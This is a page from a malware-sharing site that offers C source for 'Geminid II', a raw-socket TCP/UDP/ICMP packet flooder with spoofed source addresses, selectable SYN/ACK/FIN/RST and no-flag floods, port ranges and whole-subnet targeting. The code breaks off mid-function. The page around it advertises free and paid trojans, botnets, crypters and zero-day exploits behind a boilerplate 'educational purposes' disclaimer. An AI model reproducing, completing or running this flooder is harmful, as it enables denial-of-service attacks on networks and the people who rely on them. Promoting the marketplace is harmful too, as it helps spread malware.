banner 1




Freetrojanbotnet.com the final database of trojans, botnets, viruses, worms, exploits .... and a great resource for vulnerability researchers and security professionals. Our purpose is to gather submissions from operators and various mailing lists and concentrate them in a database easy to navigate. This was written solely for educational purposes. Use it at your own risk. The author will not be liable for any damages.



[ Important Info ]

Verified Verified


[ Detailed Information ]

Full title G3M Geminid II. TCP/UDP/ICMP Packet flooder
Date add 09-01-2015
Category Source Botnet
Risk
Description

G3M Geminid II. TCP/UDP/ICMP Packet flooder

 
/*
 * Geminid II. TCP/UDP/ICMP Packet flooder
 *
 *
 * Usage: geminid [-T -U -I -N -s -h -d -p -q -l -t]
 *
 *     -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN]   (no default         )
 *     -U UDP attack                                (no options         )
 *     -I ICMP attack                               (no options         )
 *     -N Bogus No flag attack                      (no options         )
 *     -s source class/ip                           (defaults to random )
 *     -h destination host/ip                       (no default         )
 *     -d destination class                         (no default         )
 *     -p destination port range [start,end]        (defaults to random )
 *     -q source port range [start,end]             (defaults to random )
 *     -l % of box link to use                      (defaults to 100%   )
 *     -t timeout                                   (defaults to forever)
 *
 *
 * Compiling
 * 
 *      Default:
 *      % gcc geminid.c -o geminid
 *
 *      With password file option:
 *      % gcc -DF_PASS geminid.c -o geminid
 *
 * by LIVE
 */



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>

#ifdef F_PASS
#include <sys/stat.h>
#endif

#include <netinet/in_systm.h>                                                   
#include <sys/socket.h>
#include <string.h>
#include <time.h>

#ifndef __USE_BSD
#   define __USE_BSD
#endif

#ifndef __FAVOR_BSD
#   define __FAVOR_BSD
#endif

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>


#ifdef LINUX
#   define FIX(x)  htons(x)
#else
#   define FIX(x)  (x)
#endif


/* Geminid attack flags */
#define TCP_ACK         1
#define TCP_FIN         2
#define TCP_SYN         4
#define TCP_RST         8
#define UDP_CFF        16
#define ICMP_ECHO_G    32
#define TCP_NOF        64 /* -N */

/* No flag attack */
#define TH_NOF         0x0

#define TCP_ATTACK()    (a_flags & TCP_ACK ||\
                         a_flags & TCP_FIN ||\
                         a_flags & TCP_SYN ||\
                         a_flags & TCP_RST ||\
                         a_flags & TCP_NOF)


#define UDP_ATTACK()    (a_flags & UDP_CFF)
#define ICMP_ATTACK()   (a_flags & ICMP_ECHO_G)


#define CHOOSE_DST_PORT() dst_sp == 0 ?\
                          random ()   :\
                          htons(dst_sp + (random() % (dst_ep -dst_sp +1)));


#define CHOOSE_SRC_PORT() src_sp == 0 ?\
                          random ()   :\
                          htons(src_sp + (random() % (src_ep -src_sp +1)));


#define SEND_PACKET()   if (sendto(rawsock,\
                                   &packet,\
                                   (sizeof packet),\
                                   0,\
                                   (struct sockaddr *)&target,\
                                    sizeof target) < 0) {\
                                        perror("sendto");\
                                        exit(-1);\
                        }



/* Linux / SunOS x86 / FreeBSD */
//#define BANNER_CKSUM 54018

/* SunOS Sparc */
#define BANNER_CKSUM 723


u_long lookup(const char *host);
unsigned short in_cksum(unsigned short *addr, int len);                         
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_tcp(u_char th_flags);
static void send_udp(u_char garbage);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);


u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct sockaddr_in target;

/* Self promotion :) */
const char *banner = "Geminid II. by live [TCP/UDP/ICMP Packet flooder]";

struct pseudo_hdr {         /* See RFC 793 Pseudo Header */
    u_long saddr, daddr;    /* source and dest address   */
    u_char mbz, ptcl;       /* zero and protocol         */
    u_short tcpl;           /* tcp length                */
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};


struct {
    int gv; /* Geminid value */
    int kv; /* Kernel value */
    void (*f)(u_char);
} a_list[] = {

        /* TCP */
    { TCP_ACK, TH_ACK, send_tcp },
    { TCP_FIN, TH_FIN, send_tcp },
    { TCP_SYN, TH_SYN, send_tcp },
    { TCP_RST, TH_RST, send_tcp },
    { TCP_NOF, TH_NOF, send_tcp }, /* No flag attack */

        /* UDP */
    { UDP_CFF, 0, send_udp }, 

        /* ICMP */
    { ICMP_ECHO_G, ICMP_ECHO, send_icmp },
    { 0, 0, (void *)NULL },
};


int
main(int argc, char *argv[])
{
    int n, i, on = 1;
    int b_link;
#ifdef F_PASS
    struct stat sb;
#endif
    unsigned int until;


    a_flags = dstaddr = i = 0;
    dst_sp = dst_ep = src_sp = src_ep = 0;
    until = b_link = -1;
    src_class = dst_class = NULL;
    while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) {
        char *p;

        switch (n) {
            case 'T': /* TCP attack 
                       *
                       * 0: ACK
                       * 1: FIN
                       * 2: RST
                       * 3: SYN
                       */

                switch (atoi(optarg)) {
                    case 0: a_flags |= TCP_ACK; break;
                    case 1: a_flags |= TCP_FIN; break;
                    case 2: a_flags |= TCP_RST; break;
                    case 3: a_flags |= TCP_SYN; break;
                }
                break;

            case 'U': /* UDP attack
                       */
                a_flags |= UDP_CFF;
                break;

            case 'I': /* ICMP attack
                       */
                a_flags |= ICMP_ECHO_G;
                break;

            case 'N': /* Bogus No flag attack (TCP)
                       */
                a_flags |= TCP_NOF;
                break;

            case 's':
                src_class = optarg;
                break;

            case 'h':
                dstaddr = lookup(optarg);    
                break;

            case 'd':
                dst_class = optarg;
                i = 1; /* neat flag to check command line later */
                break;

            case 'p':
                if ( (p = (char *) strchr(optarg, ',')) == NULL)
                    usage(argv[0]);
                dst_sp = atoi(optarg); /* Destination start port */
                dst_ep = atoi(p +1);   /* Destination end port */
                break;

            case 'q':
                if ( (p = (char *) strchr(optarg, ',')) == NULL)
                    usage(argv[0]);
                src_sp = atoi(optarg); /* Source start port */
                src_ep = atoi(p +1);   /* Source end port */
                break;

            case 'l':
                b_link = atoi(optarg);
                if (b_link <= 0 || b_link > 100)
                    usage(argv[0]);
                break;

            case 't':
                until = time(0) +atoi(optarg);
                break;

            default:
                usage(argv[0]);
                break;
        }
    }

    /* Checking command line */
    if ( (!dstaddr && !i) || 
         (dstaddr && i) ||
         (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
         (src_sp != 0 && src_sp > src_ep) ||
         (dst_sp != 0 && dst_sp > dst_ep))
            usage(argv[0]);

    srandom(time(NULL) ^ getpid());

    /* Opening RAW socket */
    if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket");
        exit(-1);
    }

    if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
        (char *)&on, sizeof(on)) < 0) {
            perror("setsockopt");
            exit(-1);
    }

    /* Filling target structure */
    target.sin_family           = AF_INET;

    /* Packeting! */
    for (n = 0; ; ) {

        /* Poor link control handling */
        if (b_link != -1 && random() % 100 +1 > b_link) {
            if (random() % 200 +1 > 199)
                usleep(1);
            continue;
        }

        /* Sending requested packets */
        for (i = 0; a_list[i].f != NULL; ++i) {
            if (a_list[i].gv & a_flags)
                a_list[i].f(a_list[i].kv);
        }         

        /* Attack is finished? Do not check it every time, would eat
         * too much CPU */
        if (n++ == 100) {
            if (until != -1 && time(0) >= until) break;
            n = 0;
        }
    }
                
    exit(0);
}


u_long
lookup(const char *host)
{
    struct hostent *hp;

    if ( (hp = gethostbyname(host)) == NULL) {
        perror("gethostbyname");
        exit(-1);
    }

    return *(u_long *)hp->h_addr;
}


#define RANDOM() (int) random() % 255 +1

char *
class2ip(const char *class)
{
    static char ip[16];
    int i, j;

    for (i = 0, j = 0; class[i] != '\0'; ++i)
        if (class[i] == '.')
            ++j;

    switch (j) {
        case 0:
            sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
            break;
        case 1:
            sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
            break;
        case 2:
            sprintf(ip, "%s.%d", class, RANDOM());
            break;

        /* Spoofing single host */
        default: strncpy(ip, class, 16);
                 break;
    }
    return ip;
}


unsigned short
in_cksum(unsigned short *addr, int len)
{
    int nleft = len;
    int sum = 0;
    unsigned short *w = addr;
    unsigned short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /*
     * Mop up an odd byte, if necessary
     */
    if (nleft == 1) {
        *(unsigned char *) (&answer) = *(unsigned char *)w;
        sum += answer;
    }

    /*
     * Add back carry outs from top 16 bits to low 16 bits
     */
    sum    = (sum >> 16) + (sum & 0xffff);  /* add hi 16 to low 16 */
    sum   += (sum >> 16);                   /* add carry           */
    answer = ~sum;                          /* truncate to 16 bits */

    return answer;
}


/*
 * Creating generic ip header, not yet ready to be used.
 */
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{


    /* Filling IP header */
    ip->ip_hl             = 5;
    ip->ip_v              = 4;
    ip->ip_p              = p;
    ip->ip_tos            = 0x08; /* 0x08 */
    ip->ip_id             = random();
    ip->ip_len            = len;
    ip->ip_off            = 0;
    ip->ip_ttl            = 255;

    ip->ip_dst.s_addr     = dst_class != NULL ?
                            inet_addr(class2ip(dst_class)) :
                            dstaddr;

    ip->ip_src.s_addr     = src_class != NULL ? 
                            inet_addr(class2ip(src_class)) : 
                            random();

    /* I know, this is not part of the game, but anyway.. */
    target.sin_addr.s_addr = ip->ip_dst.s_addr;
}    


static void
send_tcp(u_char th_flags)
{
    struct cksum cksum;
    struct packet {
        struct ip ip;
        struct tcphdr tcp;
    } packet;


    /* Filling IP header */
    memset(&packet, 0, sizeof packet);
    inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
    packet.ip.ip_sum        = in_cksum((void *)&packet.ip, 20);

    /* Filling cksum pseudo header */
    cksum.pseudo.daddr      = dstaddr;
    cksum.pseudo.mbz        = 0;
    cksum.pseudo.ptcl       = IPPROTO_TCP;
    cksum.pseudo.tcpl       = htons(sizeof(struct tcphdr));
    cksum.pseudo.saddr      = packet.ip.ip_src.s_addr;

    /* Filling TCP header */
    packet.tcp.th_flags     = 0;
    packet.tcp.th_win       = htons(65535);
    packet.tcp.th_seq       = random();
    packet.tcp.th_ack       = 0;
    packet.tcp.th_flags     = th_flags;
    packet.tcp.th_off       = 5; 
    packet.tcp.th_urp       = 0;
    packet.tcp.th_sport     = CHOOSE_SRC_PORT();
    packet.tcp.th_dport     = CHOOSE_DST_PORT();
    cksum.tcp               = packet.tcp;
    packet.tcp.th_sum       = in_cksum((void *)&cksum, sizeof(cksum));
    SEND_PACKET();
}


static void
send_udp(u_char garbage) /* No use for garbage here, just to remain */
{                        /* coherent with a_list[]                  */
    struct packet {
        struct ip ip;
        struct udphdr udp;
    } packet;


    /* Filling IP header */
    memset(&packet, 0, sizeof packet);
    inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);

    /* Filling UDP header */
    packet.udp.uh_sport         = CHOOSE_SRC_PORT();
    packet.udp.uh_dport         = CHOOSE_DST_PORT();
    packet.udp.uh_ulen          = htons(sizeof packet.udp);
    packet.udp.uh_sum           = 0; /* No checksum */
    SEND_PACKET();
}


static void
send_icmp(u_char gargabe) /* Garbage discarded again.. */
{
    struct packet {
        struct ip ip;
        struct icmp icmp;
    } packet;


    /* Filling IP header */
    memset(&packet, 0, sizeof packet);
    inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);

    /* Filling ICMP header */
    packet.icmp.icmp_type       = ICMP_ECHO;
    packet.icmp.icmp_code       = 0;
    packet.icmp.icmp_cksum      = htons( ~(ICMP_ECHO << 8));
    SEND_PACKET();
}


static void
usage(const char *argv0)
{
    printf("%s \n", banner);
Password freetrojanbotnet.com


Download Please LOGIN to download
Download 2 Please LOGIN to download
Download (VIP MEMBERS ONLY) Only vip members able to download

Terms of use of comments:
  • Users are forbidden to exchange personal contact details
  • Haggle on other sites\projects is forbidden
  • Reselling is forbidden
Punishment: permanent block of user account with all Gold.



Add new comment



Free Share Trojans, Viruses, Botnets, Worms, keylog, Crypter, exploits 0day, andromeda bot crack, betabot crack ,Zeus bot.

Buy Sell (Trojans, Viruses, Botnets, Worms, keylog, Crypter, exploits 0 day, exploits zero..........)
Send all submissions to [email protected] freetrojanbotnet[at]gmail.com [gpg]
Copyright © 2008-2014 Virus Team